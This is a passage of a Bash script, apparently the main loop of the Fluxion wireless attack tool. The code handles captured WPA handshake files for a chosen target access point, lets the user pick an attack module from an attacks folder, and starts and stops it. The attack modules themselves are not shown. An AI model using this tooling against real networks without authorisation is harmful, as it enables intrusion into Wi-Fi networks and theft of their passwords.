# ask the user if we should use it, or to skip it.
if [ -f "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" -a \
-s "$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap" ]; then
fluxion_header
echo -e "$FLUXIONVLine $FLUXIONFoundHashNotice"
echo
view_target_ap_info
echo -e "Path: ${CClr}$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap"
echo -ne "${CRed}$FLUXIONUseFoundHashQuery$CClr [${CWht}Y$CClr/n] "
if [ ! $FLUXIONAuto ];then
read APTargetHashPathConsidered
fi
if [ "$APTargetHashPathConsidered" = "" -o "$APTargetHashPathConsidered" = "y" -o "$APTargetHashPathConsidered" = "Y" ]; then
APTargetHashPath="$FLUXIONHashPath/$APTargetSSIDClean-$APTargetMAC.cap"
check_hash
# If the user decides to go back, we must unset.
if [ $? -ne 0 ]; then unset_hash; return 1; fi
fi
fi
# If the hash was not found, or if it was skipped,
# ask for location or for gathering one.
while [ ! -f "$APTargetHashPath" -o ! -s "$APTargetHashPath" ]; do
fluxion_header
echo -e "$FLUXIONVLine $FLUXIONHashSourceQuery"
echo
view_target_ap_info
local choices=("$FLUXIONHashSourcePathOption" "$FLUXIONHashSourceRescanOption" "$FLUXIONGeneralBackOption")
io_query_choice "" choices[@]
case "$IOQueryChoice" in
"$FLUXIONHashSourcePathOption") set_hash_path; check_hash;;
"$FLUXIONHashSourceRescanOption") set_hash;; # Rescan checks hash automatically.
"$FLUXIONGeneralBackOption" ) unset_hash; return 1;;
esac
# This conditional is required for return values
# of operation performed in the case statement.
if [ $? -ne 0 ]; then unset_hash; return 1; fi
done
# Copy to workspace for hash-required operations.
cp "$APTargetHashPath" "$FLUXIONWorkspacePath/$APTargetSSIDClean-$APTargetMAC.cap"
}
###################################### < Attack > ######################################
function unset_attack() {
if [ "$FLUXIONAttack" ]
then unprep_attack
fi
FLUXIONAttack=""
}
# Select attack strategie that will be used
function set_attack() {
if [ "$FLUXIONAttack" ]; then return 0; fi
unset_attack
fluxion_header
echo -e "$FLUXIONVLine $FLUXIONAttackQuery"
echo
view_target_ap_info
local attacks=(attacks/* "$FLUXIONGeneralBackOption")
attacks=("${attacks[@]/attacks\//}")
attacks=("${attacks[@]/.sh/}")
io_query_choice "" attacks[@]
if [ "$IOQueryChoice" = "$FLUXIONGeneralBackOption" ]; then
unset_target_ap
unset_attack
return 1
fi
FLUXIONAttack=$IOQueryChoice
source "attacks/$FLUXIONAttack/attack.sh"
prep_attack
if [ $? -ne 0 ]; then
unset_attack
return 1
fi
}
# Attack
function run_attack() {
start_attack
local choices=("$FLUXIONSelectAnotherAttackOption" "$FLUXIONGeneralExitOption")
io_query_choice "`io_dynamic_output $FLUXIONAttackInProgressNotice`" choices[@]
# IOQueryChoice is a global, meaning, its value is volatile.
# We need to make sure to save the choice before it changes.
local choice="$IOQueryChoice"
stop_attack
if [ "$choice" = "$FLUXIONGeneralExitOption" ]; then exitmode; fi
unset_attack
}
################################### < FLUXION Loop > ###################################
check_dependencies
set_resolution
set_language
while true; do
set_interface; if [ $? -ne 0 ]; then continue; fi
set_scanner; if [ $? -ne 0 ]; then continue; fi
set_target_ap; if [ $? -ne 0 ]; then continue; fi
set_attack; if [ $? -ne 0 ]; then continue; fi
run_attack; if [ $? -ne 0 ]; then continue; fi
done
# FLUXSCRIPT END
Reference in New Issue View Git Blame Copy Permalink